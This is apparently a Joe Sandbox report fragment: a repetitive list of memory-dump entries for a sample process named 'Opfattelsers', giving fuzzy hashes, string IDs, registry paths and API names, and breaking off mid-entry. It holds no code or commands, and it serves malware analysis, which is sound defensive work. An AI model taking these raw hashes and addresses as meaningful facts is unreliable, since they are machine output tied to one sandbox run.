                                                                            • Instruction ID: bf963a349a3a102b0a559032cf7fc06ce7966fef5ac9ad0b7cae753d4cd9ef8c
                                                                            • Opcode Fuzzy Hash: 3f7eac3fe077d4cf5999324592b7d672f0daf77d2941c04e62e6a26ca2c0521b
                                                                            • Instruction Fuzzy Hash: 3C11EB71B10119BBDB089B5CC848A9EB6F9BB883B0F51016DE407DB310DA71BD41D790
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$AddD
                                                                            • API String ID: 0-2525844869
                                                                            • Opcode ID: a8123638fb98e57d7aa4c28801d515952487399451645ddee0c84c9935ab3675
                                                                            • Instruction ID: 6ae7631b32b4efc22b1828356b4b8f016c60be8a3796c63d1d5422bae1f719fa
                                                                            • Opcode Fuzzy Hash: a8123638fb98e57d7aa4c28801d515952487399451645ddee0c84c9935ab3675
                                                                            • Instruction Fuzzy Hash: 0FA16B76604704AFD315CB54C845FABB7E9FF84704F604A2EF9948A150E7B0F945CB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$TargetPath
                                                                            • API String ID: 0-4164548946
                                                                            • Opcode ID: f55388f5f5abb736b847ffd1f0d2f572d4f658a6738927e8ee699fac1c609ba2
                                                                            • Instruction ID: 972a5fa25ff5bfb08de3f2415f45d7fd03285902657d8da037e7641ca8e9b9e6
                                                                            • Opcode Fuzzy Hash: f55388f5f5abb736b847ffd1f0d2f572d4f658a6738927e8ee699fac1c609ba2
                                                                            • Instruction Fuzzy Hash: 7181D07190875A9FD715CF68C884A9BB7A4BF84714F418A3EF9459F210E331EC45CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                            • API String ID: 0-4122831824
                                                                            • Opcode ID: 407e194341b19fd3ada4186aeb136c6c8357401e4fb66fb13e97bcaeada20d66
                                                                            • Instruction ID: 4df6432a76985f45abaed90018c07580b431dd2d9bffc9f1533845cd32950fc7
                                                                            • Opcode Fuzzy Hash: 407e194341b19fd3ada4186aeb136c6c8357401e4fb66fb13e97bcaeada20d66
                                                                            • Instruction Fuzzy Hash: CC91B0755057419FC314CF28C884BABB7E4BF88364F580A2EE595CB290EB34F985CB52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Log$RXACT
                                                                            • API String ID: 2994545307-2401810139
                                                                            • Opcode ID: e90d8dd2c80ab22d20233e822f91c81275dbd29108021d3fb8b8664e3dbda49e
                                                                            • Instruction ID: 5dac43eea1cc05849646143468406d71246a58e77d4895db2253cdbda95caa8f
                                                                            • Opcode Fuzzy Hash: e90d8dd2c80ab22d20233e822f91c81275dbd29108021d3fb8b8664e3dbda49e
                                                                            • Instruction Fuzzy Hash: FE7139B5908349AFD711CF64D894E6BBBE8FF88754F00492AF5449A220E771ED048BA2
                                                                            Strings
                                                                            • RedirectedKey, xrefs: 1F87BA8E
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1F87BA44
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                            • API String ID: 0-1388552009
                                                                            • Opcode ID: c88d2b7183968319f542f78f77861b1819945c2ece752bd6b9ab1effd159efb7
                                                                            • Instruction ID: f2c8c9b8d66d38e47da57270058efda13abf031eb373304fe5e593e3fd65bd6e
                                                                            • Opcode Fuzzy Hash: c88d2b7183968319f542f78f77861b1819945c2ece752bd6b9ab1effd159efb7
                                                                            • Instruction Fuzzy Hash: F96125B1C00229EFDB10CF94C888ADEBFB9FF48714F14425AE905AB214DB359A45CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$
                                                                            • API String ID: 3446177414-233714265
                                                                            • Opcode ID: 988cb36b60c2dc6472ded6730dc08e75b439fff06bfcb4593c5a14e2143c18f4
                                                                            • Instruction ID: 39cc3d216150de5ff9c58374ac2a16c3611b8a3e03ad63ccbddc2a8eaccc19a1
                                                                            • Opcode Fuzzy Hash: 988cb36b60c2dc6472ded6730dc08e75b439fff06bfcb4593c5a14e2143c18f4
                                                                            • Instruction Fuzzy Hash: 8361B975A0078ADFDB20CFA4D988BDDB7B1BF49B04F00446DD515AB280DB76B942DB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14bc2aa5a70706450592525c08bd157078d7cc122c21fb2713f9eef6225e0050
                                                                            • Instruction ID: 368a721de00c1683b66bc126beced779b15a951c7d91f668acce41a0a85f6945
                                                                            • Opcode Fuzzy Hash: 14bc2aa5a70706450592525c08bd157078d7cc122c21fb2713f9eef6225e0050
                                                                            • Instruction Fuzzy Hash: 56811C75E40309AEDB11DFA5CC85E9FB7F8AF89710F10051AA516AF191D7B0B940CB64
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a28ff1cb92347c09fb0033ea98e2bac3985c8581d9bdcae288bf3a0cf93cdb7
                                                                            • Instruction ID: 7ca763ef6ca1533af3d46deeb3b841c28a1025f0cb55c7253e01eab806cdae49
                                                                            • Opcode Fuzzy Hash: 3a28ff1cb92347c09fb0033ea98e2bac3985c8581d9bdcae288bf3a0cf93cdb7
                                                                            • Instruction Fuzzy Hash: FD615575A016069FD708CF78C484A9DFBB5BF88314F19826ED41AAB300DB31B952CBD0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: _vswprintf_s
                                                                            • String ID:
                                                                            • API String ID: 677850445-0
                                                                            • Opcode ID: 35134b599b7f02cb1538c059a45ffb5025507aa2f8c691e1c693071051140c32
                                                                            • Instruction ID: 7fb6ba4565ba8741e5e9943f182fb94a63db0922563f8c5fe9b3cfb96e9d4aab
                                                                            • Opcode Fuzzy Hash: 35134b599b7f02cb1538c059a45ffb5025507aa2f8c691e1c693071051140c32
                                                                            • Instruction Fuzzy Hash: 0D61DF75D0025ACAEB21CF68D854BAEBBB0FF05320F1142AED8799B381D7756941DB90
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1F7A7932
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 885266447-0
                                                                            • Opcode ID: 3b0f33847ccaf5caba22eed3f06a2238ea51501693150f2a94bb40ea43b5fe07
                                                                            • Instruction ID: 394ed5a22c79c3114cecb580393b11a887a313a789086c61a82a5c0cf8f6a877
                                                                            • Opcode Fuzzy Hash: 3b0f33847ccaf5caba22eed3f06a2238ea51501693150f2a94bb40ea43b5fe07
                                                                            • Instruction Fuzzy Hash: ED515971A08342DFC314CF28C48491AFBE5FB88754F5A4A6EE5969B350E732E945CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            • API String ID: 0-248832578
                                                                            • Opcode ID: ce7ae67cc6a5476eac5c90ab6b783a72ef94a0dee47b2ad540ce2f13fef81473
                                                                            • Instruction ID: e879ce2f294161b502209e5d2fe2bf6fd10ba0e79aac7e42682d5b345c911801
                                                                            • Opcode Fuzzy Hash: ce7ae67cc6a5476eac5c90ab6b783a72ef94a0dee47b2ad540ce2f13fef81473
                                                                            • Instruction Fuzzy Hash: 7CE18E75D00A699FCB24DFA9C4806EDB7F1FF44700F61815AE885AF2A0E774AD92CB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 56caf274ccd6e6d3a6f0e79eeac7060a821c35dcf63c6806f4039e88ec66db3b
                                                                            • Instruction ID: 4bb32491ff8e5ad2364709ed1fcb9e6c46232e97e4390c8d7128682d6de3acb9
                                                                            • Opcode Fuzzy Hash: 56caf274ccd6e6d3a6f0e79eeac7060a821c35dcf63c6806f4039e88ec66db3b
                                                                            • Instruction Fuzzy Hash: D0317839715A46FFD7459B64DE44E89BBA2FF84300F485269E8018BA50DB32F831CBC0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: c7815ab36a5ad94ca24110acc7bf9f50e1044c1a22fb40b4674ec9ed8218ac15
                                                                            • Instruction ID: 83f0f414e012ef8cb2577c195b287d7e81025222396ac2cbb8a941517e33abc1
                                                                            • Opcode Fuzzy Hash: c7815ab36a5ad94ca24110acc7bf9f50e1044c1a22fb40b4674ec9ed8218ac15
                                                                            • Instruction Fuzzy Hash: 5F318D39605A86FFDB459B28DE44E9ABB66FF84354F445225E8014BA60DB35F830CBC0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 85299d3d23152e0a7eaa9ca65471fd3e5a54321346b3fcb54f42b5fffea52345
                                                                            • Instruction ID: aaf0a39c80666c0586d96ade131d9f5bf69fdc37b55ed2ca136f2c7c9e218452
                                                                            • Opcode Fuzzy Hash: 85299d3d23152e0a7eaa9ca65471fd3e5a54321346b3fcb54f42b5fffea52345
                                                                            • Instruction Fuzzy Hash: 362136312053519FD7918F14C998B56BBA1FF81715F1A165DE8400FB50DAB3FC04CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c7b48ee93625ebb0cea958117af9d77de256c2be171a6d43195c838dfca30e8
                                                                            • Instruction ID: d208db1604a1188181ba72bb2cab6679eafa4bf04c5273ab4eded7f180f8adab
                                                                            • Opcode Fuzzy Hash: 8c7b48ee93625ebb0cea958117af9d77de256c2be171a6d43195c838dfca30e8
                                                                            • Instruction Fuzzy Hash: 1F218D36601B419FD725CB28D894B86B7E5FF89714F14497DE592CB6A0EBB0B801CB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: dd39b3b204f15cf407f151b6a9eabe41620f27d62ccd159cf7abe8b7ccf21ef6
                                                                            • Instruction ID: 02e7d7a0073dd026b5f0f354f2dd5dff3376578b7b6c499d081ebf63d95525ce
                                                                            • Opcode Fuzzy Hash: dd39b3b204f15cf407f151b6a9eabe41620f27d62ccd159cf7abe8b7ccf21ef6
                                                                            • Instruction Fuzzy Hash: 20218D36500585EFCF068F58CD88B9EBBA2FF89700F1501A4E8005F265DB35E915EBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: b331cef463695fe0c8141ace74cf9c04730ea49b51e48d1d24c8c3c822ac9cb0
                                                                            • Instruction ID: 10d119e9f7311b634989e8996143ce4260753f50965ac642cbb22e0e987df053
                                                                            • Opcode Fuzzy Hash: b331cef463695fe0c8141ace74cf9c04730ea49b51e48d1d24c8c3c822ac9cb0
                                                                            • Instruction Fuzzy Hash: 7C210075A053889FDB028FA8C954BDDBBA4EF06304F0000AAE955AB391D779AD00C761
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 130a54d5f0e5ae2c36f1396410c59cd0002eaefd913e539fecf38d9ee0efc3d2
                                                                            • Instruction ID: fe78a22b9fdc73676d46b454440c7e2ba1b32dbd7b028c791428c3d5bacd1de6
                                                                            • Opcode Fuzzy Hash: 130a54d5f0e5ae2c36f1396410c59cd0002eaefd913e539fecf38d9ee0efc3d2
                                                                            • Instruction Fuzzy Hash: 59E06572714254ABDB08DB58D845B4A73ECEBC87A8F14009DF50BDB140D672ED40E650
                                                                            Strings
                                                                            • System Volume Information, xrefs: 1F84DEBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: System Volume Information
                                                                            • API String ID: 0-764423717
                                                                            • Opcode ID: f19a91ffb7de7e60dacde6ede65dbeea629f5dfb50dbaaf00edb017f219ae25b
                                                                            • Instruction ID: 3d8c9b1ef33872c451929ea93abc9ebd6edb7586fff8e3d95580ff72f08d8f9f
                                                                            • Opcode Fuzzy Hash: f19a91ffb7de7e60dacde6ede65dbeea629f5dfb50dbaaf00edb017f219ae25b
                                                                            • Instruction Fuzzy Hash: 4B617B75508349AFD321DF54D880E6BB7E9FF98B54F00092EF9819B2A0E674ED44CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                            • Instruction ID: 11eb1ba1909560dc026c679fdcb3deef2ac8002ff3d7fab1b15d301483ef70ad
                                                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                            • Instruction Fuzzy Hash: D4619E79D00219EFDB11DFA5D844FDEBBB4FF84710F154269E811AB290E775A920CBA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CWDIllegalInDLLSearch
                                                                            • API String ID: 0-473384322
                                                                            • Opcode ID: c6a86c7f1bc92f63a7e174609bf5f7060534f20d5a7be3611759ea4085486aad
                                                                            • Instruction ID: 6834b7a563564868266feadec199c35cfa8ae2422b05086a5f1ad9a362fdcab6
                                                                            • Opcode Fuzzy Hash: c6a86c7f1bc92f63a7e174609bf5f7060534f20d5a7be3611759ea4085486aad
                                                                            • Instruction Fuzzy Hash: 8451E6B9904746ABD315CE64D895B56B7E8FB44720F800A2EF961DF650E330FD88CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                            • Instruction ID: 845a6927f316f432031bb27cec80d229961a26ae11b3a74afd76e56fcc268686
                                                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                            • Instruction Fuzzy Hash: 1C517A72604745AFD7118F64C848F6BB7E8FF84750F40092AB9809B290E7B5FD85CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                            • Instruction ID: dbc61f3c7f18af3ae6801c13a76eef3e43e1c73dd592e65dc504f77f4a53c04e
                                                                            • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                            • Instruction Fuzzy Hash: AB516A756047109FC321CF65D840A6BBBF8FF88710F008A2EF9959B6A0E7B4E954CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
